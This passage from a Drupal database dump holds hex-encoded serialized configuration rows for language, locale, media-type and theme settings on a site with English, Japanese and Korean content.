0x613a31303a7b733a343a2275756964223b733a33363a2263663436376161652d373261352d343065342d623764382d663064323462323935323130223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a313b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31353a226e6f64652e61637469766974696573223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a31303a2261637469766974696573223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.node.announcement', 0x613a31303a7b733a343a2275756964223b733a33363a2237326363303333622d653433322d346466662d623564622d323361313436366432306430223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a313b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31373a226e6f64652e616e6e6f756e63656d656e74223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.node.article', 0x613a31303a7b733a343a2275756964223b733a33363a2231616630343766352d343035342d346234612d623339662d323139623966653563313339223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31323a226e6f64652e61727469636c65223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a373a2261727469636c65223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.node.language_center', 0x613a31303a7b733a343a2275756964223b733a33363a2263636236383533342d666565312d343838322d393732622d666235373231373161376439223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a313a7b733a373a22656e61626c6564223b623a313b7d7d733a323a226964223b733a32303a226e6f64652e6c616e67756167655f63656e746572223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a31353a226c616e67756167655f63656e746572223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.node.page', 0x613a31303a7b733a343a2275756964223b733a33363a2261396338353337382d613236632d346136372d613136322d646264616666663235666461223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31343a226e6f64652e747970652e70616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a313b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a393a226e6f64652e70616765223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a343a2270616765223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.node.slider', 0x613a31303a7b733a343a2275756964223b733a33363a2238633531363533642d396134342d346665312d613663352d363537633164343565373664223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226e6f64652e747970652e736c69646572223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a313a7b733a373a22656e61626c6564223b623a303b7d7d733a323a226964223b733a31313a226e6f64652e736c69646572223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a226e6f6465223b733a31333a227461726765745f62756e646c65223b733a363a22736c69646572223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.path_alias.path_alias', 0x613a31303a7b733a343a2275756964223b733a33363a2266366330353938642d663866382d343739612d623430662d653336303964363032616436223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a31303a22706174685f616c696173223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2264686a464142527a6d3532446b52586e596a61355a6f48776a593052336745476963334b7044555867526f223b7d733a323a226964223b733a32313a22706174685f616c6961732e706174685f616c696173223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31303a22706174685f616c696173223b733a31333a227461726765745f62756e646c65223b733a31303a22706174685f616c696173223b733a31363a2264656661756c745f6c616e67636f6465223b733a333a22756e64223b733a31383a226c616e67756167655f616c74657261626c65223b623a313b7d),
('', 'language.content_settings.shortcut.default', 0x613a31303a7b733a343a2275756964223b733a33363a2265373265386561662d313632322d343362392d623138652d333832623330393439306239223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a2273686f72746375742e7365742e64656661756c74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31363a2273686f72746375742e64656661756c74223b733a32313a227461726765745f656e746974795f747970655f6964223b733a383a2273686f7274637574223b733a31333a227461726765745f62756e646c65223b733a373a2264656661756c74223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.taxonomy_term.tags', 0x613a31303a7b733a343a2275756964223b733a33363a2237313465666266332d373838312d343336322d616536322d386136633136626336376462223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a227461786f6e6f6d792e766f636162756c6172792e74616773223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a31383a227461786f6e6f6d795f7465726d2e74616773223b733a32313a227461726765745f656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a31333a227461726765745f62756e646c65223b733a343a2274616773223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.content_settings.user.user', 0x613a31303a7b733a343a2275756964223b733a33363a2230666632623164622d363637632d346534662d383736352d616661613839633262336234223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b693a313b733a343a2275736572223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b613a323a7b733a373a22656e61626c6564223b623a303b733a31353a2262756e646c655f73657474696e6773223b613a313a7b733a32363a22756e7472616e736c617461626c655f6669656c64735f68696465223b733a313a2230223b7d7d7d733a323a226964223b733a393a22757365722e75736572223b733a32313a227461726765745f656e746974795f747970655f6964223b733a343a2275736572223b733a31333a227461726765745f62756e646c65223b733a343a2275736572223b733a31363a2264656661756c745f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b733a31383a226c616e67756167655f616c74657261626c65223b623a303b7d),
('', 'language.entity.en', 0x613a31303a7b733a343a2275756964223b733a33363a2231373934346565372d373161622d346662632d386133382d383337636234303937663537223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226c425844706444505851747266544a516872364d6a524a4a45457959536f524a3061636476484c73576541223b7d733a323a226964223b733a323a22656e223b733a353a226c6162656c223b733a373a22456e676c697368223b733a393a22646972656374696f6e223b733a333a226c7472223b733a363a22776569676874223b693a2d393b733a363a226c6f636b6564223b623a303b7d),
('', 'language.entity.ja', 0x613a393a7b733a343a2275756964223b733a33363a2237386235306366642d653136362d343939362d626332392d346236666139303331636336223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a323a226964223b733a323a226a61223b733a353a226c6162656c223b733a383a224a6170616e657365223b733a393a22646972656374696f6e223b733a333a226c7472223b733a363a22776569676874223b693a2d31303b733a363a226c6f636b6564223b623a303b7d),
('', 'language.entity.ko', 0x613a393a7b733a343a2275756964223b733a33363a2230343965633463372d666433322d343930652d386233362d643264653235643265393539223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a323a226964223b733a323a226b6f223b733a353a226c6162656c223b733a363a224b6f7265616e223b733a393a22646972656374696f6e223b733a333a226c7472223b733a363a22776569676874223b693a2d383b733a363a226c6f636b6564223b623a303b7d),
('', 'language.entity.und', 0x613a31303a7b733a343a2275756964223b733a33363a2234643966613435392d616230362d346562352d386664632d623735383763626638616635223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22654e58366c4c434b44615938336e434d6832304d792d2d2d7930334b6269466c76383032444b4343707667223b7d733a323a226964223b733a333a22756e64223b733a353a226c6162656c223b733a31333a224e6f7420737065636966696564223b733a393a22646972656374696f6e223b733a333a226c7472223b733a363a22776569676874223b693a333b733a363a226c6f636b6564223b623a313b7d),
('', 'language.entity.zxx', 0x613a31303a7b733a343a2275756964223b733a33363a2235336632623262372d333865612d346661302d613365362d333062613034303964306532223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22333543656657626e7a6169797463673361636578787a5f4754767577496a59645f5a54636d6d522d745841223b7d733a323a226964223b733a333a227a7878223b733a353a226c6162656c223b733a31343a224e6f74206170706c696361626c65223b733a393a22646972656374696f6e223b733a333a226c7472223b733a363a22776569676874223b693a343b733a363a226c6f636b6564223b623a313b7d),
('', 'language.mappings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22454d576537597534513565442d4e55664e7551415747427659554e5a5049696e7a7445744f4e536d734463223b7d733a333a226d6170223b613a31303a7b733a323a226e6f223b733a323a226e62223b733a323a227074223b733a353a2270742d7074223b733a323a227a68223b733a373a227a682d68616e73223b733a353a227a682d7477223b733a373a227a682d68616e74223b733a353a227a682d686b223b733a373a227a682d68616e74223b733a353a227a682d6d6f223b733a373a227a682d68616e74223b733a363a227a682d636874223b733a373a227a682d68616e74223b733a353a227a682d636e223b733a373a227a682d68616e73223b733a353a227a682d7367223b733a373a227a682d68616e73223b733a363a227a682d636873223b733a373a227a682d68616e73223b7d7d),
('', 'language.negotiation', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22754565504954493974563657717a6d735462374d6650436935795057585378414e3178654c63594651624d223b7d733a373a2273657373696f6e223b613a313a7b733a393a22706172616d65746572223b733a383a226c616e6775616765223b7d733a333a2275726c223b613a333a7b733a363a22736f75726365223b733a31313a22706174685f707265666978223b733a383a227072656669786573223b613a333a7b733a323a22656e223b733a323a22656e223b733a323a226a61223b733a323a226a61223b733a323a226b6f223b733a323a226b6f223b7d733a373a22646f6d61696e73223b613a333a7b733a323a22656e223b733a303a22223b733a323a226a61223b733a303a22223b733a323a226b6f223b733a303a22223b7d7d733a31373a2273656c65637465645f6c616e67636f6465223b733a31323a22736974655f64656661756c74223b7d),
('', 'language.types', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2264716f7546715673654e4a4e76456a736f594b7862696e464f49547543785968693479324f544e51505f38223b7d733a333a22616c6c223b613a333a7b693a303b733a31383a226c616e67756167655f696e74657266616365223b693a313b733a31363a226c616e67756167655f636f6e74656e74223b693a323b733a31323a226c616e67756167655f75726c223b7d733a31323a22636f6e666967757261626c65223b613a313a7b693a303b733a31383a226c616e67756167655f696e74657266616365223b7d733a31313a226e65676f74696174696f6e223b613a333a7b733a31363a226c616e67756167655f636f6e74656e74223b613a313a7b733a373a22656e61626c6564223b613a313a7b733a31383a226c616e67756167652d696e74657266616365223b693a303b7d7d733a31323a226c616e67756167655f75726c223b613a313a7b733a373a22656e61626c6564223b613a323a7b733a31323a226c616e67756167652d75726c223b693a303b733a32313a226c616e67756167652d75726c2d66616c6c6261636b223b693a313b7d7d733a31383a226c616e67756167655f696e74657266616365223b613a313a7b733a373a22656e61626c6564223b613a313a7b733a31323a226c616e67756167652d75726c223b693a303b7d7d7d7d),
('', 'locale.settings', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226353645965452d5f41514554434e5a6e6c38424d4653392d73566e352d2d567a4159494c6b70504255624d223b7d733a31333a2263616368655f737472696e6773223b623a313b733a31373a227472616e736c6174655f656e676c697368223b623a303b733a31303a226a617661736372697074223b613a313a7b733a393a226469726563746f7279223b733a393a226c616e677561676573223b7d733a31313a227472616e736c6174696f6e223b613a383a7b733a31303a227573655f736f75726365223b733a31363a2272656d6f74655f616e645f6c6f63616c223b733a31363a2264656661756c745f66696c656e616d65223b733a33303a222570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a32323a2264656661756c745f7365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a32303a226f76657277726974655f637573746f6d697a6564223b623a303b733a32343a226f76657277726974655f6e6f745f637573746f6d697a6564223b623a313b733a32303a227570646174655f696e74657276616c5f64617973223b693a303b733a343a2270617468223b733a33323a2273697465732f64656661756c742f66696c65732f7472616e736c6174696f6e73223b733a31343a22696d706f72745f656e61626c6564223b623a313b7d7d),
('', 'media.settings', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22506c577456515859356f4b595a71434d505868365350616d5861676e35426f5a7167414938455939577359223b7d733a31333a2269636f6e5f626173655f757269223b733a32383a227075626c69633a2f2f6d656469612d69636f6e732f67656e65726963223b733a31333a22696672616d655f646f6d61696e223b4e3b733a32303a226f656d6265645f70726f7669646572735f75726c223b733a33333a2268747470733a2f2f6f656d6265642e636f6d2f70726f7669646572732e6a736f6e223b733a31343a227374616e64616c6f6e655f75726c223b623a303b7d),
('', 'media.type.audio', 0x613a31333a7b733a343a2275756964223b733a33363a2262663232623963372d656463322d343931302d626131362d656630373466323934316564223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22654a77386e36546b32744f335a7973754565475231675a613179526666615a7a523474305137694e757273223b7d733a323a226964223b733a353a22617564696f223b733a353a226c6162656c223b733a353a22417564696f223b733a31313a226465736372697074696f6e223b733a32383a2241206c6f63616c6c7920686f7374656420617564696f2066696c652e223b733a363a22736f75726365223b733a31303a22617564696f5f66696c65223b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b623a303b733a31323a226e65775f7265766973696f6e223b623a313b733a32303a22736f757263655f636f6e66696775726174696f6e223b613a313a7b733a31323a22736f757263655f6669656c64223b733a32323a226669656c645f6d656469615f617564696f5f66696c65223b7d733a393a226669656c645f6d6170223b613a313a7b733a343a226e616d65223b733a343a226e616d65223b7d7d),
('', 'media.type.document', 0x613a31333a7b733a343a2275756964223b733a33363a2235656361313764352d666365632d343335302d396565662d393731386361383965656466223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225f4439713358536e5036696b3977653955756f54765a73514b5075594e705f47395066775674577a676e51223b7d733a323a226964223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a383a22446f63756d656e74223b733a31313a226465736372697074696f6e223b733a34343a22416e2075706c6f616465642066696c65206f7220646f63756d656e742c20737563682061732061205044462e223b733a363a22736f75726365223b733a343a2266696c65223b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b623a303b733a31323a226e65775f7265766973696f6e223b623a313b733a32303a22736f757263655f636f6e66696775726174696f6e223b613a313a7b733a31323a22736f757263655f6669656c64223b733a32303a226669656c645f6d656469615f646f63756d656e74223b7d733a393a226669656c645f6d6170223b613a313a7b733a343a226e616d65223b733a343a226e616d65223b7d7d),
('', 'media.type.image', 0x613a31333a7b733a343a2275756964223b733a33363a2261623461636433662d353133622d346666392d393632622d656332646137623331356432223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2236516f706535774737485570563074504f424d7444495f475a6b4846634631586a346867443943755f684d223b7d733a323a226964223b733a353a22696d616765223b733a353a226c6162656c223b733a353a22496d616765223b733a31313a226465736372697074696f6e223b733a33363a22557365206c6f63616c20696d6167657320666f72207265757361626c65206d656469612e223b733a363a22736f75726365223b733a353a22696d616765223b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b623a303b733a31323a226e65775f7265766973696f6e223b623a313b733a32303a22736f757263655f636f6e66696775726174696f6e223b613a313a7b733a31323a22736f757263655f6669656c64223b733a31373a226669656c645f6d656469615f696d616765223b7d733a393a226669656c645f6d6170223b613a313a7b733a343a226e616d65223b733a343a226e616d65223b7d7d),
('', 'media.type.remote_video', 0x613a31333a7b733a343a2275756964223b733a33363a2237333139643932612d633539352d343436322d613562622d623033653763626262376266223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22684942546e444767444b6e4369503648555a6d316d3736303044485545704336464e334c51347355675a34223b7d733a323a226964223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a31323a2252656d6f746520766964656f223b733a31313a226465736372697074696f6e223b733a34363a22412072656d6f74656c7920686f7374656420766964656f2066726f6d20596f7554756265206f722056696d656f2e223b733a363a22736f75726365223b733a31323a226f656d6265643a766964656f223b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b623a303b733a31323a226e65775f7265766973696f6e223b623a313b733a32303a22736f757263655f636f6e66696775726174696f6e223b613a333a7b733a31323a22736f757263655f6669656c64223b733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b733a32303a227468756d626e61696c735f6469726563746f7279223b733a34343a227075626c69633a2f2f6f656d6265645f7468756d626e61696c732f5b646174653a637573746f6d3a592d6d5d223b733a393a2270726f766964657273223b613a323a7b693a303b733a373a22596f7554756265223b693a313b733a353a2256696d656f223b7d7d733a393a226669656c645f6d6170223b613a313a7b733a353a227469746c65223b733a343a226e616d65223b7d7d),
('', 'media.type.video', 0x613a31333a7b733a343a2275756964223b733a33363a2265656263613031382d353637302d346634322d386631632d303639313631363536363638223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22687a67766352675a486c747157663868426d74746f5768393574434a6f504c32356c507139595349527359223b7d733a323a226964223b733a353a22766964656f223b733a353a226c6162656c223b733a353a22566964656f223b733a31313a226465736372697074696f6e223b733a32383a2241206c6f63616c6c7920686f7374656420766964656f2066696c652e223b733a363a22736f75726365223b733a31303a22766964656f5f66696c65223b733a32353a2271756575655f7468756d626e61696c5f646f776e6c6f616473223b623a303b733a31323a226e65775f7265766973696f6e223b623a313b733a32303a22736f757263655f636f6e66696775726174696f6e223b613a313a7b733a31323a22736f757263655f6669656c64223b733a32323a226669656c645f6d656469615f766964656f5f66696c65223b7d733a393a226669656c645f6d6170223b613a313a7b733a343a226e616d65223b733a343a226e616d65223b7d7d),
('', 'media_library.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225f33675173436e5a454c556a555571486b385353683862586e7837545a774e39357663744165564a473630223b7d733a31313a22616476616e6365645f7569223b623a303b7d),
('', 'menu_ui.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2253714d61727a496a7843334638645a6f3946454f786671444b445f73645731746263465456314241327a55223b7d733a32343a226f766572726964655f706172656e745f73656c6563746f72223b623a303b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'new_comet.settings', 0x613a3537393a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e65567877446861743053703130384c42464c563768415366764545794d58494751556670627468596259223b7d733a383a2273657474696e6773223b613a313032363a7b733a31343a226c61796f7574735f656e61626c65223b693a313b733a31373a22656e61626c655f657874656e73696f6e73223b693a313b733a32333a22656e61626c655f726573706f6e736976655f6d656e7573223b693a313b733a31333a22656e61626c655f696d61676573223b693a313b733a31383a22656e61626c655f746f7563685f69636f6e73223b693a313b733a31323a22656e61626c655f666f6e7473223b693a313b733a31333a22656e61626c655f7469746c6573223b693a313b733a31363a22656e61626c655f6c6962726172696573223b693a303b733a32303a22656e61626c655f6d6f62696c655f626c6f636b73223b693a313b733a31373a22656e61626c655f736c69646573686f7773223b693a313b733a31373a22656e61626c655f73686f7274636f646573223b693a303b733a31373a22656e61626c655f637573746f6d5f637373223b693a313b733a32333a22656e61626c655f6d61726b75705f6f7665727269646573223b693a303b733a31323a22656e61626c655f646576656c223b693a313b733a32323a22656e61626c655f6c65676163795f62726f7773657273223b693a303b733a31363a22736b69705f6c696e6b5f746172676574223b733a32333a22626c6f636b2d6e65775f636f6d65742d636f6e74656e74223b733a31313a2273756767657374696f6e73223b613a313a7b733a343a2270616765223b733a343a2270616765223b7d733a31333a226c61796f75745f6d6574686f64223b693a303b733a31363a226d61785f77696474685f656e61626c65223b693a313b733a31353a226d61785f77696474685f76616c7565223b733a323a223735223b733a31343a226d61785f77696474685f756e6974223b733a323a22656d223b733a32333a22627265616b706f696e745f67726f75705f6c61796f7574223b733a31343a2261745f636f72652e73696d706c65223b733a32313a22706167655f776964655f6c6561646572626f617264223b733a303a22223b733a31363a22706167655f776964655f686561646572223b733a31303a2274776f636f6c2d362d36223b733a31363a22706167655f776964655f6e6176626172223b733a303a22223b733a32313a22706167655f776964655f686967686c696768746564223b733a303a22223b733a31383a22706167655f776964655f6665617475726573223b733a31343a227468726565636f6c2d342d342d34223b733a32343a22706167655f776964655f636f6e74656e745f707265666978223b733a303a22223b733a31343a22706167655f776964655f6d61696e223b733a32393a227468726565636f6c2d736f757263652d6f7264657265642d332d362d33223b733a32343a22706167655f776964655f636f6e74656e745f737566666978223b733a303a22223b733a32313a22706167655f776964655f7375626665617475726573223b733a31353a22666f7572636f6c2d332d332d332d33223b733a31363a22706167655f776964655f666f6f746572223b733a303a22223b733a32333a22706167655f7461626c65745f6c6561646572626f617264223b733a303a22223b733a31383a22706167655f7461626c65745f686561646572223b733a303a22223b733a31383a22706167655f7461626c65745f6e6176626172223b733a303a22223b733a32333a22706167655f7461626c65745f686967686c696768746564223b733a303a22223b733a32303a22706167655f7461626c65745f6665617475726573223b733a32363a227468726565636f6c2d73706c69742d726f772d31322d2d362d36223b733a32363a22706167655f7461626c65745f636f6e74656e745f707265666978223b733a303a22223b733a31363a22706167655f7461626c65745f6d61696e223b733a32363a227468726565636f6c2d73706c69742d726f772d31322d2d362d36223b733a32363a22706167655f7461626c65745f636f6e74656e745f737566666978223b733a303a22223b733a32333a22706167655f7461626c65745f7375626665617475726573223b733a32363a22666f7572636f6c2d73706c69742d726f772d362d362d2d362d36223b733a31383a22706167655f7461626c65745f666f6f746572223b733a303a22223b733a32333a22706167655f6d6f62696c655f6c6561646572626f617264223b733a303a22223b733a31383a22706167655f6d6f62696c655f686561646572223b733a303a22223b733a31383a22706167655f6d6f62696c655f6e6176626172223b733a303a22223b733a32333a22706167655f6d6f62696c655f686967686c696768746564223b733a303a22223b733a32303a22706167655f6d6f62696c655f6665617475726573223b733a303a22223b733a32363a22706167655f6d6f62696c655f636f6e74656e745f707265666978223b733a303a22223b733a31363a22706167655f6d6f62696c655f6d61696e223b733a303a22223b733a32363a22706167655f6d6f62696c655f636f6e74656e745f737566666978223b733a303a22223b733a32333a22706167655f6d6f62696c655f7375626665617475726573223b733a303a22223b733a31383a22706167655f6d6f62696c655f666f6f746572223b733a303a22223b733a32383a22706167655f776964655f6c6561646572626f6172645f776569676874223b733a323a222d33223b733a33303a22706167655f7461626c65745f6c6561646572626f6172645f776569676874223b733a313a2231223b733a33303a22706167655f6d6f62696c655f6c6561646572626f6172645f776569676874223b733a323a222d33223b733a32333a22706167655f776964655f6865616465725f776569676874223b733a333a222d3131223b733a32353a22706167655f7461626c65745f6865616465725f776569676874223b733a313a2232223b733a32353a22706167655f6d6f62696c655f6865616465725f776569676874223b733a333a222d3131223b733a32333a22706167655f776964655f6e61766261725f776569676874223b733a333a222d3130223b733a32353a22706167655f7461626c65745f6e61766261725f776569676874223b733a313a2233223b733a32353a22706167655f6d6f62696c655f6e61766261725f776569676874223b733a333a222d3130223b733a32383a22706167655f776964655f686967686c6967687465645f776569676874223b733a323a222d39223b733a33303a22706167655f7461626c65745f686967686c6967687465645f776569676874223b733a313a2234223b733a33303a22706167655f6d6f62696c655f686967686c6967687465645f776569676874223b733a323a222d39223b733a32353a22706167655f776964655f66656174757265735f776569676874223b733a323a222d37223b733a32373a22706167655f7461626c65745f66656174757265735f776569676874223b733a313a2235223b733a32373a22706167655f